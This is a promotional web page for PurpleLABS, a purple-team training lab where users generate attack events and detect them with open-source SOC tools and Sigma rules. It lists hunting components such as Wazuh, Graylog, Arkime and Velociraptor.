Elastic Security
Elastic Security unifies SIEM, endpoint security, and cloud security on an open platform, arming SecOps teams to protect, detect, and respond at scale.
Platform
The primary goal of PurpleLABS is to show and teach you how to generate offensive attack events/symptoms that you will detect in the next phase by using Open Source SOC stack powered by Sigma Rules - the open standard event description ruleset - and the rest of the dedicated, Open Source security solutions in use.
- Detection as Code vs Adversary Simulations
Use “Detection as Code vs Adversary Simulations” unique approach and increase your level of knowledge in Red / Blue / Purple scope - Attack events
Generate APT/offensive attack events and detect them by using Open Source SOC stack powered by Sigma rules - a generic Signature Format for SIEM Systems - Flip mode
Learn detection through the attack in an attractive, standardized format driven by the Open Source Security community. - Visibility and accounting
Improve the detection capability of your SOC teams and achieve better visibility, accounting, and resistance to attacks - Open Source for detection and hunting
Find how to use the greatest Open Source projects for your Security Operation Center by playing on the real network with Wazuh, Graylog, Elastic Security, Falco, Tracee, Kunai, Sysmon4Linux, FleetDM OSQuery, Syslog, Velociraptor, Zeek, Suricata and more.
Key Features
Virtual infrastructure
Dedicated virtual infrastructure for conducting detection and analysis of modern adversary's tactics, techniques, and procedures.
Analytical interfaces
Analytical interfaces for all-important host, network and application data sources useful during DFIR activities.
Learning abilities
Allows for learning about current trends of offensive actions (red-teaming) vs detection points (blue-teaming).
Hunting friendly
Provides an alternative approach to dealing wich cyber-attacks by pro-active searching across security data in a standardized approach.
Hunting Components
Splunk
Splunk is a software for searching, monitoring, and analyzing data. It captures, indexes, and correlates real-time data and can generate graphs, reports, alerts, dashboards, and visualizations.
Moloch/Arkime FPC
Moloch/Arkime is a large scale indexed packet capture and search system. It stores and indexes network traffic in PCAP format, providing fast access to data over ES.
Wazuh
Wazuh is an Open Source Security HIDS Platform. It helps you to gain deeper security visibility into your infrastructure by monitoring hosts at an operating system and application level.
Graylog
Graylog is a free and open source log management that allows for collecting, indexing, and analyzing both structured and unstructured data from almost any source.
FleetDM OSquery
FleetDM is an open source fork of the Kolide Fleet server. This central management server allows you to deploy and control your OSquery endpoints at scale for Hunting, Detection and Incident Response.
Velociraptor DFIR
Velociraptor is a tool for collecting host based state information using Velocidex Query Language (VQL) queries. It's a unique, advanced open-source endpoint monitoring, digital forensic and cyber response platform.
Sandfly Security
Sandfly is an agentless intrusion detection and incident response platform for Linux. It automates searching for hackers, malware, and suspicious activity on your Linux systems.
Our Customers & Recommendations
Contact Us
If you have any question, please use the form below:
